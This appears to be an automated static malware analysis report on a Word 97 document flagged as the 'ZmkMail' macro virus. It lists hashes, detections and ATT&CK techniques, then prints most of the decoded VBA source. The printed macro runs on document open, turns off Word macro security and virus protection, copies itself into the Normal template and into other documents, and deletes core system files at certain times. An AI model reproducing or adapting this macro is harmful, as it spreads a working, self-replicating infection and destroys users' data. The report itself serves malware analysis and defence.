Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31668148a5864393…

MALICIOUS

Office (OLE)

36.5 KB Created: 1999-04-15 16:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a9f2a1bcaf86e04efdfb347c5cc6ec69 SHA-1: 2a1c74af89c4f4a1d550c91cba737cd68bb5bbe2 SHA-256: 31668148a58643933b5c2b9a1daafd95628ac8c46807934b5a6ad71685e6d41e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution in malicious Office documents. The macro attempts to disable security settings and export itself to 'C:\Mail.sys', suggesting it's part of a downloader or dropper mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Zmk-9' further indicate malicious intent.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17083 bytes
SHA-256: 695f6152b6417fb7bcb6a8e1ca349cb2c0314778c9953d9fbd30fa3c99e0202f
Detection
ClamAV: Doc.Trojan.Zmk-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZmkMail"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo ErrorDocOpen
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Dim MyTime, COL, COLTemp, NumRnd
MyTime = Time
NumRnd = Int(Rnd * 13) + 1
THeur$ = Mid(MyTime, 1, 2)
TMin$ = Mid(MyTime, 4, 5)
TSec$ = Mid(MyTime, 7, 8)
iMacroNormalTempCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalTempCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "ZmkMail" Then
        ZmkMailNormInstalled = -1
    End If
Next i
If Not ZmkMailNormInstalled Then
    ActiveDocument.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\mail.sys"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
    COLTemp = NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 1, "Sub FileTemplates()"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 2, "    Application.EnableCancelKey = wdCancelDisabled"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 3, "End Sub"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 4, "Sub ToolsMacro()"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 5, "    Application.EnableCancelKey = wdCancelDisabled"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 6, "End Sub"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 7, "Sub ViewVBCode()"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 8, "    Application.EnableCancelKey = wdCancelDisabled"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 9, "End Sub"
Else
    iMacroDocuCount = ActiveDocument.VBProject.VBComponents.Count
    For i = 1 To iMacroDocuCount
        If ActiveDocument.VBProject.VBComponents(i).Name = "ZmkMail" Then
            ZmkMailDocInstalled = -1
        End If
    Next i
If Not ZmkMailDocInstalled Then
    NormalTemplate.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
    ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Mail.sys"
    ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
    COL = ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
    ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines COL - 8, 9
    ActiveDocument.Save
End If
If (THeur$ = "12") Or (TMin$ = "12") Or (TSec$ = "12") Then
    Call PayMail
Else
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.TypeText "1*1=1 2*2=4 3*3=9"
    If (NumRnd = 13) And (TMin$ = "13") Then
        MsgBox "Clear Files", , "Microsoft Word"
        Kill "C:\Autoexec.bat"
        Kill "C:\Config.sys"
        Kill "C:\msdos.sys"
        Kill "c:\io.sys"
    End If
End If
End If
ErrorDocOpen:
End Sub
Private Sub PayMail()
On Error GoTo ErrorPayMail
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\
... (truncated)